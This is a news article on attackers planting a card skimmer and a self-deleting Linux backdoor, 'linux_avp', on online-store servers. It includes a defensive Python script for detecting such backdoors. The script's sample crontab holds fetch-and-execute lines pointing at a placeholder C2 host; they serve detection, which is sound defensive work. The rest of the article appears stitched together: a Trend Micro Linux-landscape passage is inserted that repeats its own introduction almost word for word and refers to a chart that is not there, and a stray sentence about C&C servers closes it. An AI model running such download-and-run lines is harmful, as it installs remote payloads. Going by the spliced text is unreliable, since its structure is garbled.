Hackers place Linux malware and web skimmer on e-commerce servers

Security researchers have discovered that attackers are injecting credit card skimmers into the payment pages of major online stores and, after injecting the skimmer, also deploying a Linux backdoor on the compromised e-commerce server. The skimmer script presents customers with a fake payment form on the store's payment page and captures the card details entered into it. The investigation found that the attackers began with an automated attack on the store, testing dozens of vulnerabilities across common online store platforms. The threat was revealed by the Sansec research team.

Linux malware not detected by security software

The same server also contained malware, which Dutch cybersecurity company Sansec detected. The Golang-based malware is downloaded as an executable named linux_avp and executed on the compromised server. Once started, it immediately removes itself from disk and disguises itself as a "ps -ef" process, the command it uses to obtain a list of running processes. Analyzing the linux_avp backdoor, Sansec found that it then awaits orders from servers in Beijing hosted on Alibaba's network.

They also found that the malware gains persistence by adding a new crontab entry that re-downloads the malicious payload from its command-and-control server and reinstalls the backdoor if it is detected and removed, or if the server reboots. So far, this backdoor has not been detected by any anti-malware engine on VirusTotal, even though a sample was first uploaded over a month ago, on October 8.
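Two host-side checks follow from the behaviour described in the last two paragraphs: a process whose on-disk binary has been unlinked while it presents itself as a short-lived command such as "ps -ef", and a crontab entry that fetches a payload from a remote server and executes it. The script below is an added example written for this page, not Sansec's tooling or anything from the malware itself; the process records, the crontab text, the path /var/tmp/linux_avp and the host c2.example.invalid are all constructed placeholders.

```python
"""Defender-side checks for a self-deleting, name-faking backdoor and for a
re-download cron entry.  Added example; all sample data is constructed."""
import os
import re
from dataclasses import dataclass


@dataclass
class ProcInfo:
    pid: int
    comm: str        # contents of /proc/<pid>/comm
    cmdline: str     # /proc/<pid>/cmdline with NUL separators replaced by spaces
    exe_target: str  # readlink of /proc/<pid>/exe


def is_masquerading_deleted_binary(p: ProcInfo) -> bool:
    """A binary that unlinked itself after exec shows up as '<path> (deleted)'
    in /proc/<pid>/exe.  A real `ps -ef` is backed by /usr/bin/ps and exits
    almost immediately, so a long-lived 'ps' with a deleted exe is suspect."""
    deleted = p.exe_target.endswith(" (deleted)")
    argv0 = p.cmdline.split(" ", 1)[0]
    looks_like_ps = p.comm == "ps" or argv0 in ("ps", "/bin/ps", "/usr/bin/ps")
    return deleted and looks_like_ps


def find_suspicious_processes(procs):
    """Return the PIDs that match the deleted-binary masquerade pattern."""
    return [p.pid for p in procs if is_masquerading_deleted_binary(p)]


def scan_proc():
    """Collect ProcInfo records from a live /proc (Linux only; needs root to
    read other users' exe links).  Entries that vanish mid-scan are skipped."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        base = f"/proc/{name}"
        try:
            with open(f"{base}/comm") as f:
                comm = f.read().strip()
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(f"{base}/exe")
        except OSError:
            continue
        procs.append(ProcInfo(int(name), comm, cmdline, exe))
    return procs


# Crontab side: a downloader followed by execution of what it fetched.
DOWNLOADER = re.compile(r"\b(curl|wget)\b[^|;&]*https?://")
EXEC_AFTER_FETCH = re.compile(r"\|\s*(ba)?sh\b|&&\s*(chmod\s+\+x|\./|/tmp/|/var/tmp/)")
CRON_LINE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")


def parse_crontab(text):
    """Yield (schedule, command) pairs; comments, blanks and VAR=value lines
    are skipped.  System crontabs keep their user field inside 'command'."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group(1).strip(), m.group(2).strip()))
    return entries


def is_redownload_entry(command: str) -> bool:
    return bool(DOWNLOADER.search(command)) and bool(EXEC_AFTER_FETCH.search(command))


def find_suspicious_cron(text):
    """Return the commands of crontab entries that fetch and run remote content."""
    return [cmd for _sched, cmd in parse_crontab(text) if is_redownload_entry(cmd)]


# Constructed samples (not captured from a real host).
SAMPLE_PROCS = [
    ProcInfo(1, "systemd", "/sbin/init", "/usr/lib/systemd/systemd"),
    ProcInfo(2311, "ps", "ps -ef", "/usr/bin/ps"),                  # genuine ps
    ProcInfo(4042, "ps", "ps -ef", "/var/tmp/linux_avp (deleted)"),  # faked name, binary gone
]

SAMPLE_CRONTAB = """\
# constructed /etc/crontab-style content; c2.example.invalid is a placeholder
PATH=/usr/bin:/bin
0 2 * * * root /usr/bin/certbot renew --quiet
*/10 * * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * curl -s http://c2.example.invalid/linux_avp -o /var/tmp/.a && chmod +x /var/tmp/.a && /var/tmp/.a
@reboot wget -q -O - http://c2.example.invalid/p.sh | sh
"""

if __name__ == "__main__":
    print("suspicious PIDs:", find_suspicious_processes(SAMPLE_PROCS))
    print("suspicious cron:", find_suspicious_cron(SAMPLE_CRONTAB))
```

On a real host, `scan_proc()` replaces `SAMPLE_PROCS`, and the crontab text comes from `crontab -l` for each user plus `/etc/crontab` and `/etc/cron.d/*`; both checks are cheap enough to run from a periodic job, which also catches a re-installed backdoor after the cron entry fires.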

The uploader of that sample could be the creator of linux_avp, since it was submitted one day after researchers at Sansec, the Dutch cybersecurity company, spotted the malware while investigating the e-commerce site breach.

The current state of Linux security

Linux is powerful, versatile, and reliable, but it is not without flaws; like any other operating system, it is susceptible to attack. This section addresses the state of Linux security in the first half of 2021 and gives an in-depth view of the Linux threat landscape. We discuss pressing issues affecting Linux, including the types of malware found in the Linux world, vulnerabilities affecting the Linux OS and the software stacks running on it, and web application security risks, with a focus on how attackers exploit them to compromise Linux systems running in the cloud.

The data presented in this article comes from the Data Lake of the Trend Micro Smart Protection Network (SPN), which aggregates telemetry from all Trend Micro products. We also collected data from honeypots, sensors, anonymous telemetry, and other backend services. This data reflects the real-world prevalence of malware, exploitation, and insecurity in enterprises.

Many consider Linux a unique operating system because of its stability, flexibility, and open-source nature. Its reputation rests on numerous achievements in recent years: 100% of the world's top 500 supercomputers run on Linux, and according to W3Techs, 50.5% of the top 1,000 websites use it. Our previous article mentioned how Linux dominates the cloud, running 90% of public cloud workloads in 2017. Linux also supports cloud workloads on advanced RISC machine (Arm) processors such as AWS Graviton, offering strong value for money. Besides running 96.3% of the world's top 1 million web servers, Linux powers smartwatches, bullet trains, and even the world's major space programs.

Some security issues affecting Linux

Linux is capable, comprehensive, and dependable, but it is not without weaknesses; like any operating system, it is always exposed to attack. This part of the article examines the Linux security landscape in the first half of 2021 from the top down: the malware families that exist for Linux, the vulnerabilities affecting the Linux operating system and the various software stacks running on it, and the security risks of web applications, particularly those running in the cloud, including how attackers exploit them.

Among Linux/Unix-based deployments, Red Hat is the most used by enterprise users, followed by AWS Linux and Ubuntu. Organizations rely on well-maintained Linux distributions for their workloads, and this chart reflects the support provided by the vendors: Red Hat Enterprise Linux (RHEL) and Amazon Linux AMI are the first to offer fixes for their supported versions. This distribution of the data will not surprise most readers. However, it should be noted that about 2.6% of deployments are IBM AIX and Oracle Solaris, platforms known for their high stability and robustness, on which businesses run critical workloads.

At the time of writing, all command-and-control (C&C) servers were down, reminiscent of typical attacks aimed at a small number of targets, where the operators shut down the infrastructure once their goals are met.